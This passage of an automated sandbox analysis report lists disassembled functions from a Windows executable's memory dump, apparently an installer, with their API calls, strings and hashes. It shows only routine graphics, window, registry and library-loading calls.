                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                  • String ID: ,$?
                                                                                  • API String ID: 2359071979-2308483597
                                                                                  • Opcode ID: 44383e044abff6cbf278423e894284f1520358ef4015b87050d63fd1739e3a25
                                                                                  • Instruction ID: c427c9b06a4b8e224850f8fd68708263cabc4ba561a0b31d0e571b4226371ffb
                                                                                  • Opcode Fuzzy Hash: 44383e044abff6cbf278423e894284f1520358ef4015b87050d63fd1739e3a25
                                                                                  • Instruction Fuzzy Hash: 0C511774A00144ABDB10EF7ADC816EA7BF9AF08304B1185BBF914E73A6D738D941CB58
                                                                                  APIs
                                                                                  • GetObjectA.GDI32(?,00000018,?), ref: 0041BF38
                                                                                  • GetObjectA.GDI32(?,00000018,?), ref: 0041BF47
                                                                                  • GetBitmapBits.GDI32(?,?,?), ref: 0041BF98
                                                                                  • GetBitmapBits.GDI32(?,?,?), ref: 0041BFA6
                                                                                  • DeleteObject.GDI32(?), ref: 0041BFAF
                                                                                  • DeleteObject.GDI32(?), ref: 0041BFB8
                                                                                  • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFD5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                  • String ID:
                                                                                  • API String ID: 1030595962-0
                                                                                  • Opcode ID: 5a427f00feddb577fff5167fa7821d20935eac0201827996bfcfefe2a8efdbf4
                                                                                  • Instruction ID: 04b97f25464b58ff436fe1885c4dd039914ee627ffefe5dec802ec1f9d3f819a
                                                                                  • Opcode Fuzzy Hash: 5a427f00feddb577fff5167fa7821d20935eac0201827996bfcfefe2a8efdbf4
                                                                                  • Instruction Fuzzy Hash: 8A510571A006199FCB14DFA9C8819EEB7F9EF48314B11442AF914E7391D738AD81CB64
                                                                                  APIs
                                                                                  • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CF0E
                                                                                  • GetDeviceCaps.GDI32(00000000,00000026), ref: 0041CF2D
                                                                                  • SelectPalette.GDI32(?,?,00000001), ref: 0041CF93
                                                                                  • RealizePalette.GDI32(?), ref: 0041CFA2
                                                                                  • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041D00C
                                                                                  • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D04A
                                                                                  • SelectPalette.GDI32(?,?,00000001), ref: 0041D06F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: PaletteStretch$Select$BitsCapsDeviceModeRealize
                                                                                  • String ID:
                                                                                  • API String ID: 2222416421-0
                                                                                  • Opcode ID: d578c5c43a151ca21ad873cc4bbf55809b48f101e43ab62b7175feda3131b2cf
                                                                                  • Instruction ID: 901e13b734fcfe26ab98e85b677eebf668a0bb257bdc2dc03c804f52c9ec24c8
                                                                                  • Opcode Fuzzy Hash: d578c5c43a151ca21ad873cc4bbf55809b48f101e43ab62b7175feda3131b2cf
                                                                                  • Instruction Fuzzy Hash: 47514FB0600204AFDB14DFA9C995F9BBBF9EF08304F108599B549DB292C778ED81CB58
                                                                                  APIs
                                                                                  • SendMessageA.USER32(00000000,?,?), ref: 004573D6
                                                                                    • Part of subcall function 0042428C: GetWindowTextA.USER32(?,?,00000100), ref: 004242AC
                                                                                    • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                    • Part of subcall function 0041EEB4: EnumThreadWindows.USER32(00000000,0041EE64,00000000), ref: 0041EF09
                                                                                    • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0045743D
                                                                                  • TranslateMessage.USER32(?), ref: 0045745B
                                                                                  • DispatchMessageA.USER32(?), ref: 00457464
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$TextThreadWindow$CurrentDispatchEnumSendTranslateWindows
                                                                                  • String ID: [Paused]
                                                                                  • API String ID: 1007367021-4230553315
                                                                                  • Opcode ID: 6b168901e7e1781911bc7d22981d81ae3d793b775a360e859fc7bc33357b6a45
                                                                                  • Instruction ID: dae39b44a8721021bfcf47da434b07c1a86f758a792d2d621748dfb7f1b1fb5a
                                                                                  • Opcode Fuzzy Hash: 6b168901e7e1781911bc7d22981d81ae3d793b775a360e859fc7bc33357b6a45
                                                                                  • Instruction Fuzzy Hash: 47319531908248AEDB11DBB5EC41BDE7FB8DB4E314F558077E800E7292D67C9909CB69
                                                                                  APIs
                                                                                  • GetCursor.USER32(00000000,0046B65F), ref: 0046B5DC
                                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 0046B5EA
                                                                                  • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B65F), ref: 0046B5F0
                                                                                  • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B65F), ref: 0046B5FA
                                                                                  • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B65F), ref: 0046B600
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Cursor$LoadSleep
                                                                                  • String ID: CheckPassword
                                                                                  • API String ID: 4023313301-1302249611
                                                                                  • Opcode ID: 58e796373b9fdc746396fa9d1da2347ca5f5e20d566bce270774f79728b0c312
                                                                                  • Instruction ID: 9215a56909f4d399359b4036adebcff7cd559b99f6583fb3c160e276e3804376
                                                                                  • Opcode Fuzzy Hash: 58e796373b9fdc746396fa9d1da2347ca5f5e20d566bce270774f79728b0c312
                                                                                  • Instruction Fuzzy Hash: 34318634644604AFD711EB65C889F9E7BE0EF09308F558076B9049B3A2D778AE40CB99
                                                                                  APIs
                                                                                    • Part of subcall function 00477FD0: GetWindowThreadProcessId.USER32(00000000), ref: 00477FD8
                                                                                    • Part of subcall function 00477FD0: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,004780CF,0049D0A8,00000000), ref: 00477FEB
                                                                                    • Part of subcall function 00477FD0: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477FF1
                                                                                  • SendMessageA.USER32(00000000,0000004A,00000000,00478462), ref: 004780DD
                                                                                  • GetTickCount.KERNEL32 ref: 00478122
                                                                                  • GetTickCount.KERNEL32 ref: 0047812C
                                                                                  • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00478181
                                                                                  Strings
                                                                                  • CallSpawnServer: Unexpected status: %d, xrefs: 0047816A
                                                                                  • CallSpawnServer: Unexpected response: $%x, xrefs: 00478112
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                                  • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                                  • API String ID: 613034392-3771334282
                                                                                  • Opcode ID: c7480ea5248a76885aa581e3ee921a1a12fc6fcdeb10822e96bf497bbef75b79
                                                                                  • Instruction ID: 23b6b6b43e2695b35219bdfabe49a415745965cef25793df2ffc6287c46841aa
                                                                                  • Opcode Fuzzy Hash: c7480ea5248a76885aa581e3ee921a1a12fc6fcdeb10822e96bf497bbef75b79
                                                                                  • Instruction Fuzzy Hash: 5F319334F402159ADB10EBB9898A7EEB6A4DF45314F50C03EB548EB382DA7C8D4587AD
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 004598E7
                                                                                  Strings
                                                                                  • Fusion.dll, xrefs: 00459887
                                                                                  • Failed to load .NET Framework DLL "%s", xrefs: 004598CC
                                                                                  • .NET Framework CreateAssemblyCache function failed, xrefs: 0045990A
                                                                                  • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 004598F2
                                                                                  • CreateAssemblyCache, xrefs: 004598DE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc
                                                                                  • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                                  • API String ID: 190572456-3990135632
                                                                                  • Opcode ID: b3dedf4d09771b8e3211b538b580fafb75041ab66ed76c1853c4b6e39797986c
                                                                                  • Instruction ID: f91bc12d19f1fe408be280579c06801c7313a3191b14845461a6c76c6493a406
                                                                                  • Opcode Fuzzy Hash: b3dedf4d09771b8e3211b538b580fafb75041ab66ed76c1853c4b6e39797986c
                                                                                  • Instruction Fuzzy Hash: B1318470E04659ABCB01EFA5C88169EB7A8AF44315F50857EE814A7382DB389E08C799
                                                                                  APIs
                                                                                    • Part of subcall function 0041C058: GetObjectA.GDI32(?,00000018), ref: 0041C065
                                                                                  • GetFocus.USER32 ref: 0041C178
                                                                                  • GetDC.USER32(?), ref: 0041C184
                                                                                  • SelectPalette.GDI32(?,?,00000000), ref: 0041C1A5
                                                                                  • RealizePalette.GDI32(?), ref: 0041C1B1
                                                                                  • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1C8
                                                                                  • SelectPalette.GDI32(?,00000000,00000000), ref: 0041C1F0
                                                                                  • ReleaseDC.USER32(?,?), ref: 0041C1FD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Palette$Select$BitsFocusObjectRealizeRelease
                                                                                  • String ID:
                                                                                  • API String ID: 3303097818-0
                                                                                  • Opcode ID: 7919d48a5b742b990554a8e16781250233d38a1b512c062c402771df9818cd79
                                                                                  • Instruction ID: 8ccc34f866771a30a1661531480aea9d283d3c3e19187e20a9e7c35f18d949ed
                                                                                  • Opcode Fuzzy Hash: 7919d48a5b742b990554a8e16781250233d38a1b512c062c402771df9818cd79
                                                                                  • Instruction Fuzzy Hash: 45112C71A40609BBDB10DBE9DC85FAFB7FCEB48700F54446AB514E7281D67899408B68
                                                                                  APIs
                                                                                  • GetSystemMetrics.USER32(0000000E), ref: 00418C80
                                                                                  • GetSystemMetrics.USER32(0000000D), ref: 00418C88
                                                                                  • 6F9A2980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C8E
                                                                                    • Part of subcall function 00410808: 6F99C400.COMCTL32(0049C628,000000FF,00000000,00418CBC,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 0041080C
                                                                                  • 6FA0CB00.COMCTL32(0049C628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CDE
                                                                                  • 6FA0C740.COMCTL32(00000000,?,0049C628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CE9
                                                                                  • 6FA0CB00.COMCTL32(0049C628,00000001,?,?,00000000,?,0049C628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000), ref: 00418CFC
                                                                                  • 6F9A0860.COMCTL32(0049C628,00418D1F,?,00000000,?,0049C628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E), ref: 00418D12
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: MetricsSystem$A0860A2980C400C740
                                                                                  • String ID:
                                                                                  • API String ID: 1086221473-0
                                                                                  • Opcode ID: ea814aff01982a735542cfcaa5f2d759ebf4f13d0bc11ea9e85cdf93c4d7c833
                                                                                  • Instruction ID: 86feed5bc36cb920ea04fcbc52f338b48e1a9a04039637533027038eb31c68aa
                                                                                  • Opcode Fuzzy Hash: ea814aff01982a735542cfcaa5f2d759ebf4f13d0bc11ea9e85cdf93c4d7c833
                                                                                  • Instruction Fuzzy Hash: 43114975B44304BBEB10FBA5DC83F9D73B9DB48704F6040A6B604EB2D1DAB99D808758
                                                                                  APIs
                                                                                    • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004840C7,?,00000001,?,?,004840C7,?,00000001,00000000), ref: 0042DE48
                                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00484208), ref: 004841ED
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseOpen
                                                                                  • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                                  • API String ID: 47109696-2530820420
                                                                                  • Opcode ID: 9e77c2a8355bf950addc698619abebac90bd80bfa9f43d4adbdb48c9eae7aef1
                                                                                  • Instruction ID: c07cac4acaa77b59f2fcd2c5e8c20c92fe22663a7df472bca0d1e55dfbcce728
                                                                                  • Opcode Fuzzy Hash: 9e77c2a8355bf950addc698619abebac90bd80bfa9f43d4adbdb48c9eae7aef1
                                                                                  • Instruction Fuzzy Hash: 81119334B082059AD700F7A69C0AB5E7BE8DBA5348F6148B7B800E7281E778AE41C71C
                                                                                  APIs
                                                                                  • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                                                  • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                                                  • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                                                  • DeleteDC.GDI32(?), ref: 0041B4E9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ObjectSelect$Delete$Stretch
                                                                                  • String ID:
                                                                                  • API String ID: 1458357782-0
                                                                                  • Opcode ID: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                                                  • Instruction ID: ae96c6176d6eb3f3494de580be991e563f9897aa79c0ee3e7df45ff247fef712
                                                                                  • Opcode Fuzzy Hash: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                                                  • Instruction Fuzzy Hash: 89115C72F44619ABDB10DADDD886FEFB7BCEB08704F044455B614F7282C678AD418BA8
                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 00495BF1
                                                                                    • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00495C13
                                                                                  • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00496191), ref: 00495C27
                                                                                  • GetTextMetricsA.GDI32(00000000,?), ref: 00495C49
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00495C66
                                                                                  Strings
                                                                                  • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00495C1E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Text$CreateExtentFontIndirectMetricsObjectPointReleaseSelect
                                                                                  • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                  • API String ID: 2948443157-222967699
                                                                                  • Opcode ID: 691ce413467488e034de834b989fc2e025067cd5002ece6e443aa881a737f8dc
                                                                                  • Instruction ID: 6d86e16e7996164c3d99a70d64bcdfbf35cb9465fd6ee9b2fa75eb6a08a4ab21
                                                                                  • Opcode Fuzzy Hash: 691ce413467488e034de834b989fc2e025067cd5002ece6e443aa881a737f8dc
                                                                                  • Instruction Fuzzy Hash: 05016176A04709ABDB05DBA98C41E5FB7ECDB49704F21047ABA00E7691D678AE008B28
                                                                                  APIs
                                                                                  • GetCursorPos.USER32 ref: 004233BF
                                                                                  • WindowFromPoint.USER32(?,?), ref: 004233CC
                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233DA
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 004233E1
                                                                                  • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233FA
                                                                                  • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423411
                                                                                  • SetCursor.USER32(00000000), ref: 00423423
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                  • String ID:
                                                                                  • API String ID: 1770779139-0
                                                                                  • Opcode ID: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                                  • Instruction ID: 0489214c39e5746bc568676ade8a3ee1219ea943f6d585d977b545401c7ee2ca
                                                                                  • Opcode Fuzzy Hash: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                                  • Instruction Fuzzy Hash: 2001D42230562036D6217B795C86E2F22A8CB85B65F50447FB645BB283D93D8C00537D
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(user32.dll), ref: 00495A14
                                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00495A21
                                                                                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00495A2E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$HandleModule
                                                                                  • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                                  • API String ID: 667068680-2254406584
                                                                                  • Opcode ID: 3c8b88976e6e67713f1e6fb0365be4ac33276af7b519073db6005e1fda00490b
                                                                                  • Instruction ID: 6bb6bd91ed17cc43c826bdde37d3733eb090f1301ce7563d8f1f25412fa62683
                                                                                  • Opcode Fuzzy Hash: 3c8b88976e6e67713f1e6fb0365be4ac33276af7b519073db6005e1fda00490b
                                                                                  • Instruction Fuzzy Hash: 0AF0F6A2B42F1526DA1161760CC1B7F698CCF81760F680237BD45A7382E96C8D0543AD
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D739
                                                                                  • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045D749
                                                                                  • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045D759
                                                                                  Strings
                                                                                  Memory Dump Source
